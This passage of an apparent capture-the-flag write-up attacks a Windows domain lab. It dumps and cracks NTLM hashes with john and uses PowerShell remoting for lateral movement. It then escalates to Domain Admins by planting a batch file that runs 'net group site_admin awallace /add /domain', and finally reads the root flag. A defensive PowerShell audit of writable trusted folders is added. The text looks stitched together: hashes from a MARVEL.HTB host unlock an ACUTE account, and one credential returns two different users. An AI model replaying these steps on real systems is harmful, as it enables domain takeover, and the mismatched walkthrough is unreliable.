aes128_hmac (4096) : dedc1d09097b091f2e430a2c8d768107
des_cbc_md5 (4096) : 1089e6eca449c731
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : MVL-SVR01.MARVEL.HTBNatasha
Credentials
des_cbc_md5 : 978a07d05ba770f7
OldCredentials
des_cbc_md5 : 1089e6eca449c731
From the previous output, we get the following NTLM hashes:
Administrator:a29f7623fd11550def0192de9246f46b
Natasha:29ab86c5c4d2aab957763e5c1720486d
WDAGUtilityAccount:24571eab88ac0e2dcef127b8e9ad4740
Instead of using Pass the Hash, we will try to crack them with john:
$ echo 'Administrator:a29f7623fd11550def0192de9246f46b' >> hashes
$ echo 'Natasha:29ab86c5c4d2aab957763e5c1720486d' >> hashes
$ echo 'WDAGUtilityAccount:24571eab88ac0e2dcef127b8e9ad4740' >> hashes
$ john --wordlist=$WORDLISTS/rockyou.txt --format=NT hashes
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (NT [MD4 128/128 ASIMD 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password@123 (Administrator)
1g 0:00:00:00 DONE 1.098g/s 15762Kp/s 15762Kc/s 32676KC/s "amo-te"..*7¡Vamos!
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Lateral movement to user awallace
Now we can log in as awallace using the same procedure as before:
PS C:\Utils> $pass = ConvertTo-SecureString "Password@123" -AsPlaintext -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $pass)
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallace
This user is able to list the folder C:\Program Files\keepmeon, where we find a Batch script:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls "C:\Program Files\keepmeon" }
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat atsserver
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type "C:\Program Files\keepmeon\keepmeon.bat" }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
The script runs every 5 minutes and basically executes every Batch script found under its folder (the for /R loop is recursive), except itself.
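The two "trusted but writable" locations on this box, C:\Utils (excluded from Defender scanning earlier) and C:\Program Files\keepmeon (whose contents this script executes every five minutes), are the same class of finding. As an added example, not part of the write-up, the following PowerShell audits Defender exclusion paths and scheduled-script directories for write access by low-privileged principals; the principal list and the default directory are assumptions, and it should be run elevated. On this domain you would extend the list with groups such as ACUTE\Managers, since awallace's write access to keepmeon came through group membership rather than a broad principal.

```powershell
# Added example: report locations trusted by the system but writable by low-privileged
# principals. Run elevated. Which identities count as low-privileged is an assumption;
# add domain groups (e.g. 'ACUTE\Managers', 'ACUTE\Domain Users') to match your estate.

$LowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets a caller drop or alter a file in the directory.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Write, Modify, FullControl'

function Get-LowPrivWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    # Allow ACEs granting a listed principal any write-class right on $Path.
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
    }
}

function Get-DefenderExclusionPaths {
    # Prefer the Defender module; fall back to the registry key the write-up queried with reg.exe.
    try { return @((Get-MpPreference -ErrorAction Stop).ExclusionPath | Where-Object { $_ }) } catch { }
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
    if (Test-Path $key) { return @((Get-Item $key).Property) }   # value names are the excluded paths
    return @()
}

function Get-RiskyTrustedPaths {
    param([string[]]$ScheduledScriptDirs = @('C:\Program Files\keepmeon'))
    $candidates = @()
    foreach ($p in Get-DefenderExclusionPaths) { $candidates += [pscustomobject]@{ Path = $p; Trust = 'Defender exclusion' } }
    foreach ($p in $ScheduledScriptDirs)        { $candidates += [pscustomobject]@{ Path = $p; Trust = 'Scheduled script directory' } }

    foreach ($c in $candidates) {
        # File and wildcard exclusions are skipped here; only directories are checked.
        if (-not (Test-Path -LiteralPath $c.Path -PathType Container)) { continue }
        foreach ($ace in Get-LowPrivWriteAce -Path $c.Path) {
            [pscustomobject]@{
                Path      = $c.Path
                Trust     = $c.Trust
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-RiskyTrustedPaths | Format-Table -AutoSize
```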
Privilege escalation
Here we have to remember that Lois (lhopkins) is able to change group membership (as shown in the Word document), and keepmeon.bat is meant to be run as Lois. Therefore, we can drop a Batch script that adds awallace to the Site_Admin group. First, let's confirm the account and the group:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user lhopkins }
User name lhopkins
Full Name Lois Hopkins
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 21/12/2021 14:51:53
Password expires Never
Password changeable 22/12/2021 14:51:53
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 27/02/2022 01:31:45
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net group site_admin }
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
The command completed successfully.
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\a.bat" -Value "net group site_admin awallace /add /domain" }
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type "C:\Program Files\keepmeon\a.bat" }
net group site_admin awallace /add /domain
After a few minutes, we will see that we belong to the Domain Admins group, and therefore we can read the root.txt flag:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami /groups }
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ACUTE\Domain Admins Group S-1-5-21-1786406921-1914792807-2072761762-512 Mandatory group, Enabled by default, Enabled group
ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
ACUTE\Site_Admin Group S-1-5-21-1786406921-1914792807-2072761762-2102 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
ACUTE\Denied RODC Password Replication Group Alias S-1-5-21-1786406921-1914792807-2072761762-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }
4964aad06240586b6e55bf408011c24e